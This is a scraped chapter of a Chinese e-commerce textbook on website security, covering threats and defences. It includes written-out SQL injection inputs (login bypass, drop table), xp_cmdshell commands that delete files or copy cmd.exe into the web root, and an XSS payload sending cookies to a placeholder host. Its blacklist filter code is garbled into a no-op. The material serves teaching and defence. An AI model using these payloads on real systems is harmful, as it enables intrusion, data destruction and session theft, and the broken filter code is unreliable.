教學(xué)課件《電子商務(wù)》-第9章_第1頁(yè)
教學(xué)課件《電子商務(wù)》-第9章_第2頁(yè)
教學(xué)課件《電子商務(wù)》-第9章_第3頁(yè)
教學(xué)課件《電子商務(wù)》-第9章_第4頁(yè)
教學(xué)課件《電子商務(wù)》-第9章_第5頁(yè)
已閱讀5頁(yè),還剩44頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

9.1電子商務(wù)網(wǎng)站的安全需求電子商務(wù)網(wǎng)站運(yùn)行的基礎(chǔ)設(shè)施是互聯(lián)網(wǎng),而互聯(lián)網(wǎng)的最大特性是信息資源共享。但是,電子商務(wù)網(wǎng)站存儲(chǔ)和傳輸?shù)男畔⑹且獙?duì)交易雙方產(chǎn)生經(jīng)濟(jì)效益,許多信息并不能為所有訪問(wèn)者共享,所以電子商務(wù)網(wǎng)站有以下安全需求。1.交易信息的保密性2.交易信息的完整性3.交易信息的有效性4.交易者身份的真實(shí)性5.交易信息的不可抵賴性6.系統(tǒng)的可靠性返回9.2電子商務(wù)網(wǎng)站的安全隱患9.2.1一般的安全隱患1.計(jì)算機(jī)的安全隱患2.互聯(lián)網(wǎng)的安全隱患3.電子商務(wù)交易的安全隱患(1)交易主體的真實(shí)性(2)交易信息的截獲和竊取(3)交易信息的篡改(4)交易抵賴4.法律滯后造成的風(fēng)險(xiǎn)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患9.2.2計(jì)算機(jī)病毒1.計(jì)算機(jī)病毒的傳播途徑1)通過(guò)磁盤(pán)或者U盤(pán)在復(fù)制文件時(shí)傳播。2)通過(guò)電子郵件在發(fā)送附件時(shí)傳播。3)通過(guò)互聯(lián)網(wǎng)上的其他途徑傳播。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患2.計(jì)算機(jī)病毒的特征(1)傳染性(2)隱蔽性(3)潛伏性(4)破壞性(5)不可預(yù)見(jiàn)性上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患3.計(jì)算機(jī)病毒的危害1)在單機(jī)情況下,使得計(jì)算機(jī)系統(tǒng)不能正常工作,浪費(fèi)系統(tǒng)資源,破壞存儲(chǔ)數(shù)據(jù),以致整個(gè)計(jì)算機(jī)系統(tǒng)癱瘓。2)計(jì)算機(jī)網(wǎng)絡(luò)系統(tǒng)能夠使數(shù)臺(tái)計(jì)算機(jī)實(shí)現(xiàn)資源共享,也給計(jì)算機(jī)病毒帶來(lái)更為有利的生存和傳播環(huán)境,病毒可以按指數(shù)增長(zhǎng)模式傳播。3)計(jì)算機(jī)病毒對(duì)于數(shù)據(jù)庫(kù)的破壞,日積月累的大量數(shù)據(jù)丟失或者損壞,會(huì)造成整個(gè)管理系統(tǒng)混亂,甚至引起社會(huì)混亂,將會(huì)造成無(wú)法挽回的損失。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患9.2.3SQL注入攻擊1.簡(jiǎn)單的SQL注入攻擊SQL注入攻擊利用在編寫(xiě)代碼時(shí)沒(méi)有對(duì)重要的和特別的字符進(jìn)行過(guò)濾的漏洞,通過(guò)用戶輸入的內(nèi)容,構(gòu)造特別的SQL表達(dá)式或語(yǔ)句達(dá)到特定的目的。例如,在完成用戶登錄的頁(yè)面,對(duì)于輸入的用戶名和密碼的判斷構(gòu)造SQL語(yǔ)句,形式如下(以ASP為例):Uname=Request.Form("Username")Pass=Request.Form("Password")Sql="select*from用戶信息表where用戶名='"&Uname&"'and密碼='"&Pass&"'"其中:Username和Password為用戶在登錄時(shí)輸入的用戶名和密碼。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患這段程序就是根據(jù)用戶輸入的用戶名和密碼,查詢用戶信息表中是否有滿足條件的記錄。例如用戶輸入的用戶名和密碼分別為admin和password,則構(gòu)成查詢字符串:Sql="select*from用戶信息表where用戶名='admin'and密碼='password'"然后用這條查詢語(yǔ)句對(duì)數(shù)據(jù)表進(jìn)行查詢,即進(jìn)行所謂的登錄驗(yàn)證。如果查詢找到了滿足條件的記錄,說(shuō)明用戶信息表中存在該用戶,即登錄用戶為合法用戶,用戶登錄成功。如果查詢沒(méi)找到滿足條件的記錄,說(shuō)明輸入的用戶名和密碼不正確,用戶登錄失敗。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患這條語(yǔ)句編程思路無(wú)可挑剔、語(yǔ)法結(jié)構(gòu)完全正確,但是在安全方面存在問(wèn)題。非法訪問(wèn)者完全可以通過(guò)用戶的輸入,構(gòu)造特殊的查詢語(yǔ)句,通過(guò)驗(yàn)證,進(jìn)入網(wǎng)站系統(tǒng)。例如登錄界面的用戶名欄輸入admin,在密碼欄輸入'or'1'='1',則上述查詢語(yǔ)句成為:Sql="select*from用戶信息表where用戶名='admin'and密碼=''or'1'='1'"根據(jù)運(yùn)算順序,先執(zhí)行前面的“and”運(yùn)算,再將結(jié)果與后面的''1'='1'進(jìn)行“or”運(yùn)算。因?yàn)?1'='1'永遠(yuǎn)為真,所以最終的結(jié)果一定為真。因此該查詢語(yǔ)句的執(zhí)行結(jié)果將返回記錄集,即系統(tǒng)認(rèn)為用戶信息表中存在與用戶輸入匹配的用戶,這樣不知道用戶密碼也可以通過(guò)驗(yàn)證,成功登錄。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患2.常見(jiàn)的SQL注入方法除了上述簡(jiǎn)單的SQL注入攻擊之外,還有許多SQL注入方法。例如,如果有人猜到保存用戶名和密碼的表名是“用戶信息表”,可以在登錄界面用戶名欄輸入:

:droptable用戶信息表--上述查詢語(yǔ)句成為:Sql="select*from用戶信息表where用戶名='';droptable用戶信息表--and密碼=''"上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患由于“;”號(hào)表示一條語(yǔ)句結(jié)束,另一條語(yǔ)句開(kāi)始。上述語(yǔ)句形成兩條語(yǔ)句:select*from用戶信息表where用戶名=''droptable用戶信息表--and密碼=''第一條語(yǔ)句沒(méi)有作用,因?yàn)楸碇袥](méi)有用戶名為空。第二條語(yǔ)句將刪除數(shù)據(jù)庫(kù)中的用戶信息表,從此以后所有用戶都無(wú)法成功登錄。另外,用戶名中輸入“--”號(hào)是必需的,以表示其后的內(nèi)容為注釋,不會(huì)產(chǎn)生語(yǔ)法錯(cuò)誤。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患例如,如果有人猜到后臺(tái)管理員的登錄用戶名為“admin”,可以在登錄界面的用戶名欄輸入:admin--上述查詢語(yǔ)句成為:Sql="select*from用戶信息表where用戶名='admin--and密碼=''"由于“--”號(hào)之后的內(nèi)容為注釋,該語(yǔ)句只檢查前面的用戶名而不檢查后面的密碼。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患例如,如果有人想要獲得網(wǎng)站數(shù)據(jù)庫(kù)中的有關(guān)的表名和字段名,可以在登錄界面用戶名欄輸入:'having1=1–上述查詢語(yǔ)句成為:Sql="select*from用戶信息表where用戶名='having1=1-and密碼=''"上述語(yǔ)句執(zhí)行后,瀏覽器將顯示錯(cuò)誤信息'groupby用戶信息表.idhaving1=1–其中:用戶信息表.id中的id就是存放用戶名的字段名。還可以通過(guò)SQL注入執(zhí)行多種命令,這里不再敘述。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患3.針對(duì)Access數(shù)據(jù)庫(kù)的攻擊Access數(shù)據(jù)庫(kù)是作為文件保存在磁盤(pán)上。攻擊者可能通過(guò)竊取或猜測(cè)知道網(wǎng)站服務(wù)器Access數(shù)據(jù)庫(kù)的路徑和名稱,就可以下載這個(gè)數(shù)據(jù)庫(kù)文件,這是非常危險(xiǎn)的。比如名稱為user.mdb的數(shù)據(jù)庫(kù)存放在虛擬目錄下的database目錄下,攻擊者在瀏覽器地址欄輸入:http://網(wǎng)站URL/database/user.mdb即可下載該數(shù)據(jù)庫(kù)。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患4.針對(duì)SQLServer數(shù)據(jù)庫(kù)的攻擊在SQLServer數(shù)據(jù)庫(kù)系統(tǒng)中,有一個(gè)名為xp_cmdshell的擴(kuò)展存儲(chǔ)過(guò)程,它可以執(zhí)行任何命令行命令,這是一個(gè)非常危險(xiǎn)的存儲(chǔ)過(guò)程。查詢當(dāng)前目錄下的文件,執(zhí)行Execmasterxp_cmdshell'dir'執(zhí)行dir命令的結(jié)果是顯示目錄下的所有文件名。刪除當(dāng)前目錄下的文件,執(zhí)行Execmasterxp_cmdshell'del文件名'執(zhí)行del命令的結(jié)果是刪除指定的文件。創(chuàng)建UNICODE漏洞,執(zhí)行Execmasterxp_cmdshell'copyc:\winnt\system32\cmd.exec:\inetpub\script\cmd.exe'將操作系統(tǒng)的cmd命令復(fù)制到網(wǎng)站的根目錄下,制造了一個(gè)UNICODE漏洞。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患9.2.4跨站腳本攻擊1.跨站腳本攻擊的原理跨站腳本攻擊是HTML腳本注入的一種。當(dāng)網(wǎng)站的服務(wù)器從用戶提交的表單接收數(shù)據(jù)、不進(jìn)行驗(yàn)證和加密、就將其發(fā)往瀏覽器時(shí),就可能產(chǎn)生跨站腳本攻擊。跨站腳本攻擊能夠發(fā)生的原因是由于動(dòng)態(tài)網(wǎng)頁(yè)的應(yīng)用程序?qū)τ脩籼峤徽?qǐng)求的數(shù)據(jù)不做嚴(yán)格的檢查過(guò)濾,允許用戶在提交的數(shù)據(jù)中包含HTML標(biāo)記(最主要的是“>”“<”),保存到網(wǎng)站服務(wù)器。在其他用戶訪問(wèn)該網(wǎng)站時(shí)輸出到該用戶的瀏覽器。這些惡意提交的數(shù)據(jù)就冒充代碼被受害者的瀏覽器解釋執(zhí)行。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患例如,網(wǎng)站為合法用戶輸入數(shù)據(jù)提供一個(gè)具有表單的界面,等待用戶輸入數(shù)據(jù)。如果攻擊者在表單中輸入一些惡意的JavaScript腳本,而網(wǎng)站服務(wù)器應(yīng)用程序不對(duì)用戶輸入的內(nèi)容進(jìn)行檢查過(guò)濾,將其保存到數(shù)據(jù)庫(kù)中。當(dāng)其他合法用戶訪問(wèn)網(wǎng)站的某個(gè)網(wǎng)頁(yè)時(shí),這個(gè)網(wǎng)頁(yè)如果讀取到數(shù)據(jù)庫(kù)中保存的惡意代碼,將其加載到網(wǎng)頁(yè)中,惡意代碼就會(huì)在受害者的瀏覽器中執(zhí)行,用戶的信息就會(huì)被竊取。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患例如,在表單中輸入:<imgsrc="JavaScript:alert('您可能有危險(xiǎn)')”/>如果服務(wù)器應(yīng)用程序不對(duì)該內(nèi)容進(jìn)行檢查,直接存入服務(wù)器數(shù)據(jù)庫(kù),當(dāng)其他用戶訪問(wèn)存入上述內(nèi)容的網(wǎng)頁(yè)時(shí),就會(huì)加載上述內(nèi)容,發(fā)送到客戶機(jī)瀏覽器,瀏覽器對(duì)腳本代碼解析并執(zhí)行,客戶端就會(huì)出現(xiàn)一個(gè)“您可能有危險(xiǎn)”的警告提示框。這只是一個(gè)示范,不會(huì)對(duì)用戶或網(wǎng)站安全造成影響。如果攻擊者通過(guò)下列代碼:<scripe>document.location='http://網(wǎng)名/cookie.asp?cookie='+document.cookie</script>獲取用戶的Cookie信息(Cookie一般保存用戶登錄信息),然后就可以假冒該用戶取得相應(yīng)服務(wù)或進(jìn)行有關(guān)操作,后果將可想而知。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患2.跨站腳本攻擊的分類跨站腳本攻擊分為三種類型:反射型、存儲(chǔ)型和基于DOM型。反射型是最容易被利用的一種,例如,頁(yè)面直接返回攻擊者輸入數(shù)據(jù)給其他用戶。存儲(chǔ)型將惡意代碼存儲(chǔ)到服務(wù)器的數(shù)據(jù)庫(kù)或文件中,隨后將信息發(fā)送到訪問(wèn)數(shù)據(jù)庫(kù)或文件的用戶,這常常出現(xiàn)在博客、論壇等互聯(lián)網(wǎng)的應(yīng)用中。基于DOM型是一種在內(nèi)存中對(duì)HTML節(jié)點(diǎn)進(jìn)行操作的技術(shù),主要是對(duì)JavaScript腳本及其變量進(jìn)行操作。如果JavaScript腳本訪問(wèn)帶有參數(shù)的URL,并且需要將該信息寫(xiě)入頁(yè)面,那么就可能遭到攻擊。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患3.跨站腳本攻擊的危害1)釣魚(yú)欺詐:利用網(wǎng)站的反射型跨站腳本漏洞,將網(wǎng)頁(yè)重定向到釣魚(yú)網(wǎng)站,或者注入JavaScript腳本監(jiān)視網(wǎng)站的表單輸入,甚至發(fā)起基于DHTML的更高級(jí)的釣魚(yú)攻擊。2)網(wǎng)站掛馬:利用<iframe>嵌入隱藏的惡意網(wǎng)站,或者將被攻擊者定向到惡意網(wǎng)站,或者彈出惡意網(wǎng)站窗口等,都可以進(jìn)行掛馬攻擊。3)身份盜用:Cookie是用戶對(duì)于某個(gè)網(wǎng)站進(jìn)行身份驗(yàn)證的標(biāo)志,跨站腳本攻擊可以盜取用戶的Cookie,從而獲取用戶對(duì)該網(wǎng)站的操作權(quán)限。如果網(wǎng)站管理員的Cookie被盜取,將可能對(duì)網(wǎng)站造成毀滅性破壞。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患4)垃圾信息發(fā)送:利用跨站腳本攻擊漏洞,盜取被攻擊者身份,發(fā)送大量的垃圾信息給該用戶的有關(guān)群。5)用戶上網(wǎng)行為劫取:有些高級(jí)的跨站腳本攻擊甚至可以劫取用戶的上網(wǎng)行為,監(jiān)視用戶的瀏覽歷史、發(fā)送和接收的數(shù)據(jù)等。6)跨站腳本攻擊蠕蟲(chóng):跨站腳本攻擊蠕蟲(chóng)用于打廣告、刷流量、破壞網(wǎng)絡(luò)數(shù)據(jù)等攻擊。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患9.2.5拒絕服務(wù)攻擊拒絕服務(wù)攻擊的主要目標(biāo)是使被攻擊的網(wǎng)站或服務(wù)器不能提供正常服務(wù)。1.簡(jiǎn)單的拒絕服務(wù)攻擊攻擊者向服務(wù)器發(fā)送大量帶有虛假地址的請(qǐng)求,服務(wù)器發(fā)送回復(fù)信息后等待回傳消息。由于地址是偽造的,服務(wù)器一直等不到回傳消息,分配給該次請(qǐng)求的資源就一直不能被釋放。當(dāng)服務(wù)器等待一定的時(shí)間之后,連接會(huì)因超時(shí)而被切斷。攻擊者連續(xù)不斷地發(fā)送新的請(qǐng)求,在這種反復(fù)發(fā)送偽造地址請(qǐng)求的情況下,服務(wù)器資源最終會(huì)被耗盡。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患2.分布式拒絕服務(wù)攻擊分布式拒絕服務(wù)攻擊是一種攻擊者經(jīng)常采用,但服務(wù)器管理者難以防范的攻擊手段,是一種特殊形式的拒絕服務(wù)攻擊,是一種分布、協(xié)作的大規(guī)模攻擊方式,主要瞄準(zhǔn)大型網(wǎng)站。簡(jiǎn)單的拒絕服務(wù)攻擊只需要一臺(tái)計(jì)算機(jī)就可實(shí)現(xiàn)。分布式拒絕服務(wù)攻擊是利用一批受到控制的計(jì)算機(jī)向一臺(tái)服務(wù)器發(fā)動(dòng)攻擊。這樣來(lái)勢(shì)兇猛的攻擊難以防備,具有很大的破壞性。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患(1)攻擊的三個(gè)層次1)攻擊者:是攻擊的主控臺(tái),可以是網(wǎng)絡(luò)上的任何一臺(tái)主機(jī),甚至可以是一臺(tái)接入網(wǎng)絡(luò)的筆記本式計(jì)算機(jī)。攻擊者操縱整個(gè)攻擊過(guò)程,向主控主機(jī)發(fā)送攻擊命令。2)主控端:是攻擊的頂級(jí)執(zhí)行者,是攻擊者非法侵入并進(jìn)行控制的一些主機(jī),這些主機(jī)分別控制大量的代理主機(jī)。主控端主機(jī)上安裝特定的程序,可以接收攻擊者發(fā)來(lái)的特殊攻擊指令,并能把這些指令發(fā)送到代理主機(jī)。3)代理端:是攻擊的具體執(zhí)行者,同樣也是攻擊者非法侵入并進(jìn)行控制的一批主機(jī),在它們上面運(yùn)行攻擊程序,接收主控端發(fā)來(lái)的命令,直接向受害者主機(jī)發(fā)動(dòng)攻擊。上一頁(yè)下一頁(yè)返回9.2電子商務(wù)網(wǎng)站的安全隱患(2)攻擊的步驟1)攻擊者在互聯(lián)網(wǎng)上尋找具有漏洞的主機(jī),攻擊者侵入的主機(jī)越多,它的攻擊隊(duì)伍就越大。2)侵入之后的主機(jī)上安裝攻擊程序。其中一部分主機(jī)充當(dāng)攻擊的主控端,另一部分充當(dāng)攻擊的代理端,根據(jù)安裝的攻擊程序的不同而確定。3)各部分主機(jī)各司其職,在攻擊者的指揮下,對(duì)攻擊對(duì)象發(fā)動(dòng)攻擊。由于攻擊者在幕后操縱,所以在攻擊時(shí)不會(huì)受到監(jiān)控系統(tǒng)的跟蹤。由于分布式拒絕服務(wù)攻擊具有隱蔽性,這種攻擊很難被防范和解決。上一頁(yè)返回9.3網(wǎng)站安全的防范措施9.3.1常用的防范措施1.?dāng)?shù)據(jù)加密由于數(shù)據(jù)在存儲(chǔ)和傳輸過(guò)程中有可能被竊取而導(dǎo)致破壞,數(shù)據(jù)加密的主要目的是防止信息的非授權(quán)泄密,數(shù)據(jù)加密可用在存儲(chǔ)和傳輸中。(1)數(shù)據(jù)加密術(shù)語(yǔ)1)明文和密文:為了將數(shù)據(jù)安全地通過(guò)網(wǎng)絡(luò)發(fā)送到接收方,發(fā)送時(shí)對(duì)數(shù)據(jù)進(jìn)行某種變換,使得攻擊者即使獲得變換后的數(shù)據(jù),也看不懂其中的內(nèi)容。要發(fā)送的數(shù)據(jù)稱為明文。經(jīng)過(guò)變換后的數(shù)據(jù)稱為密文。下一頁(yè)返回9.3網(wǎng)站安全的防范措施2)加密和解密:將明文變換成密文的過(guò)程稱為加密。將密文變回到明文的過(guò)程稱為解密。3)算法和密鑰:加密和解密過(guò)程需要兩個(gè)元素,就是算法和密鑰。算法是加密或解密時(shí)所采用的一組規(guī)則。密鑰是加密和解密過(guò)程中使用的一串?dāng)?shù)字。4)密鑰長(zhǎng)度:指密鑰這一串?dāng)?shù)字的位數(shù)。密文破譯就是攻擊者經(jīng)過(guò)長(zhǎng)時(shí)間測(cè)試,破獲密鑰后解開(kāi)密文成為明文。密鑰長(zhǎng)度決定破譯的難易程度。上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施(2)數(shù)據(jù)加密技術(shù)按照加密密鑰和解密密鑰是否相同,加密技術(shù)被分成兩類:對(duì)稱密鑰加密技術(shù)和非對(duì)稱密鑰加密技術(shù)。1)對(duì)稱密鑰加密技術(shù):數(shù)據(jù)的發(fā)送方和接收方采用相同的密鑰進(jìn)行加密和解密。對(duì)稱密鑰加密技術(shù)的優(yōu)點(diǎn)是加密強(qiáng)度高,加密、解密速度快,適用于對(duì)大量數(shù)據(jù)進(jìn)行加密,能夠保證數(shù)據(jù)的保密性。缺點(diǎn)是密鑰使用一段時(shí)間需要更換,并且在密鑰傳遞過(guò)程中不能失密。對(duì)稱性加密技術(shù)的密鑰管理是數(shù)據(jù)加密安全的重要因素。上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施2)非對(duì)稱密鑰加密技術(shù):數(shù)據(jù)的發(fā)送方和接收方采用不同的密鑰進(jìn)行加密和解密。在這種加密體制中,每個(gè)網(wǎng)絡(luò)用戶都有一對(duì)唯一對(duì)應(yīng)的密鑰,即公開(kāi)密鑰和私有密鑰。公鑰可以公布在網(wǎng)絡(luò)上,也可以公開(kāi)傳送給需要的人。私鑰只有本人知道,是保密的。上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施3)數(shù)字信封:由于對(duì)稱加密和非對(duì)稱加密都有優(yōu)缺點(diǎn),實(shí)際加密過(guò)程通常將兩者結(jié)合使用,這就是所謂的數(shù)字信封。數(shù)字信封技術(shù)結(jié)合對(duì)稱加密和非對(duì)稱加密兩種加密技術(shù)的優(yōu)點(diǎn),使用兩個(gè)層次的加密獲得非對(duì)稱加密的靈活性和對(duì)稱加密的高效性。數(shù)據(jù)發(fā)送方使用自己的密鑰對(duì)數(shù)據(jù)進(jìn)行加密,生成密文。然后用接收方的公鑰加密自己的密鑰,生成數(shù)字信封。最后將密文和數(shù)字信封一起發(fā)送給接收方。接收方用私鑰對(duì)數(shù)字信封解密得到發(fā)送方加密數(shù)據(jù)的密鑰,然后用這個(gè)密鑰解密密文,得到明文。上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施(3)數(shù)據(jù)加密方法1)保鏈路加密:保鏈路加密是對(duì)網(wǎng)絡(luò)鏈路兩端的設(shè)備之間的通信提供保護(hù)。2)端到端加密:端到端加密是對(duì)發(fā)送端用戶到接收端用戶的應(yīng)用系統(tǒng)通信提供保護(hù)。3)節(jié)點(diǎn)加密:節(jié)點(diǎn)加密是對(duì)源節(jié)點(diǎn)計(jì)算機(jī)到目標(biāo)節(jié)點(diǎn)計(jì)算機(jī)之間的信息傳輸提供保護(hù)。上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施2.?dāng)?shù)字證書(shū)(1)數(shù)字證書(shū)原理數(shù)字證書(shū)采用公鑰體制,即利用一對(duì)相互匹配的密鑰進(jìn)行加密和解密。每個(gè)用戶自己設(shè)定一把特定的僅為本人所有的私鑰,用這個(gè)私鑰進(jìn)行加密和簽名。同時(shí)設(shè)定一把公鑰并公開(kāi)發(fā)布,為一組與自己有關(guān)的用戶所共享,用于給自己發(fā)送信息時(shí)加密明文。當(dāng)用戶發(fā)送需要保密的數(shù)據(jù)時(shí),使用公鑰對(duì)數(shù)據(jù)進(jìn)行加密,接收方使用對(duì)應(yīng)的私鑰進(jìn)行解密。通過(guò)一定的數(shù)字手段保證加密過(guò)程不可逆轉(zhuǎn),即只有私鑰才能解密。上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施(2)數(shù)字證書(shū)類型1)從使用對(duì)象劃分:個(gè)人數(shù)字證書(shū)、企業(yè)服務(wù)器數(shù)字證書(shū)、軟件開(kāi)發(fā)者數(shù)字證書(shū)。2)從技術(shù)角度劃分:安全套接層證書(shū)、安全電子交易證書(shū)。3)從證書(shū)用途劃分:簽名證書(shū)、加密證書(shū)。上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施3.防火墻技術(shù)防火墻技術(shù)用于保護(hù)網(wǎng)絡(luò)安全,主要作用是在網(wǎng)絡(luò)入口處檢測(cè)網(wǎng)絡(luò)通信,根據(jù)一定的安全策略,在對(duì)內(nèi)網(wǎng)實(shí)現(xiàn)安全保護(hù)的前提下,與外網(wǎng)實(shí)現(xiàn)通信,極大地提高了網(wǎng)絡(luò)通信安全。(1)防火墻概念防火墻是指一個(gè)由硬件設(shè)備和軟件程序組合而成的、在網(wǎng)絡(luò)上構(gòu)筑一道安全屏障、用于加強(qiáng)網(wǎng)絡(luò)安全的系統(tǒng)。上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施(2)防火墻安全控制策略1)凡是未被列入允許訪問(wèn)的服務(wù)都被禁止。這就是說(shuō),需要確定可以被提供的服務(wù),開(kāi)放這些服務(wù),并將未被列入的服務(wù)排除在外。2)凡是未被列入禁止訪問(wèn)的服務(wù)都被允許。這就是說(shuō),需要確定必須被禁止的服務(wù)、拒絕它們進(jìn)入,而未被列入的服務(wù)認(rèn)為是安全的,允許訪問(wèn)。上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施(3)防火墻的功能1)過(guò)濾不安全服務(wù)2)過(guò)濾非法用戶

3)設(shè)置安全和審計(jì)檢查4)數(shù)據(jù)源控制5)應(yīng)用與數(shù)據(jù)控制6)對(duì)數(shù)據(jù)加密的支持上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施4.病毒防治技術(shù)在網(wǎng)絡(luò)環(huán)境下,病毒有很強(qiáng)的威脅性和破壞力。病毒的防范是網(wǎng)絡(luò)安全建設(shè)的重要一環(huán)。主要從防毒、查毒和殺毒三個(gè)方面保護(hù)電子商務(wù)網(wǎng)站服務(wù)器和客戶機(jī)免遭病毒的感染和破壞。(1)病毒定義計(jì)算機(jī)病毒是指在計(jì)算機(jī)程序中插入的破壞計(jì)算機(jī)功能或者破壞計(jì)算機(jī)存儲(chǔ)的數(shù)據(jù)、影響計(jì)算機(jī)正常使用并且能夠自我復(fù)制的一組計(jì)算機(jī)指令或程序代碼。上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施(2)病毒種類互聯(lián)網(wǎng)上存在許許多多的計(jì)算機(jī)病毒,并且逐年成倍地增加,大致可以分為以下幾類。1)系統(tǒng)病毒

2)蠕蟲(chóng)病毒3)木馬病毒4)黑客病毒5)腳本病毒6)宏病毒

7)種植程序病毒8)破壞性程序病毒9)玩笑病毒10)捆綁機(jī)病毒上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施(3)病毒傳播途徑1)通過(guò)不能移動(dòng)的計(jì)算機(jī)硬件設(shè)備進(jìn)行傳播。這種病毒雖然較少,但破壞力極強(qiáng)。2)通過(guò)移動(dòng)存儲(chǔ)設(shè)備進(jìn)行傳播,包括軟盤(pán)、U盤(pán)、移動(dòng)硬盤(pán)等。3)通過(guò)網(wǎng)絡(luò)進(jìn)行傳播,特別是互聯(lián)網(wǎng),可以進(jìn)行世界范圍的廣泛傳播。上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施(4)病毒防治1)基于客戶機(jī)的防治:一是軟件防治,安裝查毒軟件防治病毒入侵客戶機(jī),定期或不定期地用反病毒軟件檢測(cè)客戶機(jī)的病毒感染情況,使用殺毒軟件清除客戶機(jī)病毒。二是硬件防治,在網(wǎng)絡(luò)接口卡上安裝防病毒芯片,將客戶機(jī)存取控制與病毒防護(hù)合二為一,實(shí)時(shí)有效地保護(hù)客戶機(jī)通向網(wǎng)絡(luò)的橋梁。2)基于服務(wù)器的防治:采用防病毒可裝載模塊,以提供實(shí)時(shí)掃描病毒的能力;也可以在服務(wù)器上插防毒卡,保證服務(wù)器不受病毒的攻擊,切斷病毒傳播的途徑。上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施5.其他防范措施除了以上技術(shù)層面的防范措施之外,要保證網(wǎng)站的安全,還需要在以下方面不斷完善。1)網(wǎng)站建設(shè)單位要建立健全網(wǎng)站安全方面的各項(xiàng)規(guī)章制度,并且要落實(shí)到實(shí)際工作當(dāng)中,而不只是紙上談兵,流于形式。2)網(wǎng)站負(fù)責(zé)人要提高對(duì)網(wǎng)站安全的管理重要性的認(rèn)識(shí),認(rèn)真負(fù)責(zé)貫徹單位建立的網(wǎng)站安全管理制度,加強(qiáng)為了網(wǎng)站安全而必需的硬件和軟件資金投入。3)網(wǎng)站管理人員要把網(wǎng)站安全作為頭等重要的工作任務(wù),具體貫徹單位建立的網(wǎng)站安全管理制度的各項(xiàng)實(shí)際措施。上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施9.3.2SQL注入攻擊防范措施SQL注入攻擊是由于網(wǎng)站服務(wù)器應(yīng)用程序?qū)τ脩糨斎氲臄?shù)據(jù)未能進(jìn)行有效地檢查和過(guò)濾造成的。因此,假定所有用戶輸入是可疑的,必須對(duì)其進(jìn)行驗(yàn)證。1.輸入驗(yàn)證2.執(zhí)行最小權(quán)限3.避免向用戶顯示詳細(xì)的錯(cuò)誤信息4.使用強(qiáng)類型的變量和數(shù)據(jù)庫(kù)中字段定義5.對(duì)于Access數(shù)據(jù)庫(kù)6.對(duì)于SQLServer數(shù)據(jù)庫(kù)上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施9.3.3跨站腳本攻擊防范措施1.輸入驗(yàn)證在接收用戶輸入之后或者存儲(chǔ)數(shù)據(jù)之前,驗(yàn)證數(shù)據(jù)的長(zhǎng)度、類型和規(guī)則,禁止用戶輸入HTML標(biāo)記和JavaScript腳本代碼。2.強(qiáng)輸出編碼在將用戶提交的數(shù)據(jù)顯示給用戶之前,確保用戶提供的數(shù)據(jù)被適當(dāng)編碼。上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施3.使用“黑名單”使用“黑名單”方法探測(cè)用戶輸入的數(shù)據(jù)中是否含有跨站腳本攻擊或者有害編碼,例如在用戶輸入中查找“>”“<”,并過(guò)濾這樣的黑名單字符串,過(guò)濾代碼如下:Replace(str,”<”,”<”)Replace(str,”>”,”>”)這樣,攻擊者就不能構(gòu)造自己所需要的HTML標(biāo)記。但是,攻擊者還是可以利用現(xiàn)有的標(biāo)記的屬性,例如將上傳圖片的SRC屬性中的URL替換成如下的JavaScript代碼:<imgsrc=”JavaScript:alert(‘您可能會(huì)遇到麻煩!‘)“/>因此還要過(guò)濾JavaScript腳本代碼。上一頁(yè)下一頁(yè)返回9.3網(wǎng)站安全的防范措施總之,需要替換的危險(xiǎn)字符有“&”“<”“>”““”“‘”“/”“?”“;”“:”

溫馨提示

